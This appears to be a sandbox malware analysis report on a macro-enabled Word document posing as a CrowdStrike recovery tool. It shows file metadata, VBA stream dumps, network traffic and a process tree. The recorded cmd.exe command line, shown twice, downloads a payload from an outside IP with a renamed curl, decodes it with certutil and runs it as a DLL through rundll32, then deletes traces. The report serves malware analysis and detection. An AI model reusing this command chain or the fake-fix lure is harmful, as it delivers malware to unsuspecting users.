SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
SHA512:	809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
SSDEEP:	6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
TLSH:	1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
File Content Preview:	PK..........!..am.............[Content_Types].xml ...(.........................................................................................................................................................................................................

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Author:	Le Nho Thanh
Template:	Normal.dotm
Last Saved By:	David
Revion Number:	3
Total Edit Time:	4
Create Time:	2024-07-19T10:29:00Z
Last Saved Time:	2024-07-22T09:13:00Z
Number of Pages:	9
Number of Words:	2526
Number of Characters:	14404
Creating Application:	Microsoft Office Word
Security:	0

Number of Lines:	120
Number of Paragraphs:	33
Thumbnail Scaling Desired:	false
Company:	Microsoft
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	27601
Data ASCII:	. . . . . . . . . t . . . . . . b . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . $ X . E - . B / . 8 [ . a i s . B e 2 . . . . . . . . . . . . . . . . . . . . Z . L Z . i F Z Z g 6 . . . . . . . . . . . . . . . . . . . . . . x . . . . Z . L Z . i F Z Z g 6 $ X . E - . B / . 8 [ . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . S " . . . . S . . . . . S " . . . . . < 2 . . . . . > " . . . . . < X . . . . . . . . . . . . . . . . . . L . . . .
Data Raw:	01 16 03 00 04 00 01 00 00 74 0b 00 00 e4 00 00 00 62 02 00 00 02 0c 00 00 10 0c 00 00 e0 5d 00 00 04 00 00 00 01 00 00 00 97 d9 f8 db 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 24 58 0c 45 2d c6 bb 42 af 2f 07 e1 38 5b 0b 81 c3 61 69 73 c0 cd b3 42 91 9f a4 ef 65 97 32 fe 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	376
Entropy:	5.349004928853029
Base64 Encoded:	True
Data ASCII:	I D = " { 6 3 9 4 0 D 1 7 - 7 B C 7 - 4 1 4 6 - B A 9 5 - 1 3 8 9 F F 7 0 2 C 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 6 E 4 7 9 6 1 8 9 A 1 8 9 A 1 8 9 A 1 8 9 A " . . D P B = " A A A 8 1 1 B 6 E 7 B 7 E 7 B 7 E 7 " . . G C = " 7 F 7 D C 4 E D 4 C 1 7 2 0 1 8 2 0 1 8 D F " . . . . [ H o s t E x t e n d e r I n f
Data Raw:	49 44 3d 22 7b 36 33 39 34 30 44 31 37 2d 37 42 43 37 2d 34 31 34 36 2d 42 41 39 35 2d 31 33 38 39 46 46 37 30 32 43 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

General
Stream Path:	PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

General
Stream Path:	VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2976
Entropy:	4.617966626265468
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

General
Stream Path:	VBA/__SRP_0
CLSID:
File Type:	data
Stream Size:	2782
Entropy:	3.5082390293182035
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . U . B - . . . . . . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

General
Stream Path:	VBA/__SRP_1
CLSID:
File Type:	data
Stream Size:	174
Entropy:	1.6032810527820052
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00

General
Stream Path:	VBA/__SRP_2
CLSID:
File Type:	data
Stream Size:	1224
Entropy:	2.0062113510689086
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 05 00 00 00 31 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 51 0d 00 00 00 00 00 00 00 00

General
Stream Path:	VBA/__SRP_3
CLSID:
File Type:	data
Stream Size:	356
Entropy:	2.1693699541959686
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

General
Stream Path:	VBA/dir
CLSID:
File Type:	data
Stream Size:	514
Entropy:	6.2857106919283545
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . > h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . . m A ! O f f i c g O D . f . i . c g . . ! G {
Data Raw:	01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e3 3e ab 68 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2024 15:52:01.657860994 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:01.657906055 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:01.657973051 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:01.658164978 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:01.658181906 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.368962049 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.369291067 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.369309902 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.370276928 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.370346069 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.371309996 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.371380091 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.566080093 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.566097975 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.765502930 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:10.264959097 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.264991999 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.265041113 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.265232086 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.265249014 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.954627991 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.954966068 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.954987049 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.955338955 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.955426931 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.956016064 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.956069946 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.957026005 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.957088947 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.957223892 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.957233906 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.957267046 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.004507065 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:11.156836987 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.231894016 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:11.232101917 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:11.232260942 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.233057022 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.233095884 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:12.268873930 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:12.268944025 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:12.269156933 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:13.470407009 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:13.470443964 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:01.925507069 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:01.925563097 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:01.925669909 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.019361973 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.019392967 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.712658882 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.713826895 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.713850975 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.714171886 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.715807915 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.715877056 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.920512915 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.920711994 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:12.613501072 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:12.613657951 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:12.613740921 CEST	49174	443	192.168.2.22	142.250.203.100

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2024 15:51:57.115956068 CEST	53	62751	8.8.8.8	192.168.2.22
Jul 22, 2024 15:51:57.238284111 CEST	53	49881	8.8.8.8	192.168.2.22
Jul 22, 2024 15:51:58.478197098 CEST	53	63926	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:01.649885893 CEST	58095	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:01.650075912 CEST	54261	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:01.656579018 CEST	53	54261	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:01.657058001 CEST	53	58095	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:10.242295027 CEST	62453	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:10.242433071 CEST	50568	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:10.256547928 CEST	53	62453	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:10.284553051 CEST	53	50568	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:15.490757942 CEST	53	50337	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:22.489500999 CEST	53	53406	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:32.836777925 CEST	53	64687	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:50.519622087 CEST	53	51955	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:56.966444016 CEST	53	53060	8.8.8.8	192.168.2.22

Target ID:	0
Start time:	09:51:17
Start date:	22/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f3b0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	09:51:19
Start date:	22/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Imagebase:	0x4a610000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41D51BF0.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B853177E.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2E26567.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB640B31.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{68411966-DD48-4946-AB3B-864E53BCEEA6}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD9FBDB6-0620-4DF5-9AD1-8E60378C9E3C}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp

C:\Users\user\AppData\Local\Temp\curl.exe

C:\Users\user\AppData\Local\Temp\curl.txt

C:\Users\user\AppData\Local\Temp\msoAB8B.tmp

C:\Users\user\AppData\Local\Temp\msoAFEE.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Target ID:	5
Start time:	09:51:20
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Imagebase:	0xffa90000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	09:51:23
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Imagebase:	0xff960000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	10
Start time:	09:51:54
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	11
Start time:	09:51:55
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	14
Start time:	09:51:58
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	15
Start time:	09:52:02
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	16
Start time:	09:52:16
Start date:	22/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f3b0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	17
Start time:	09:52:23
Start date:	22/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Imagebase:	0x4a610000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	09:52:24
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Imagebase:	0xff760000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
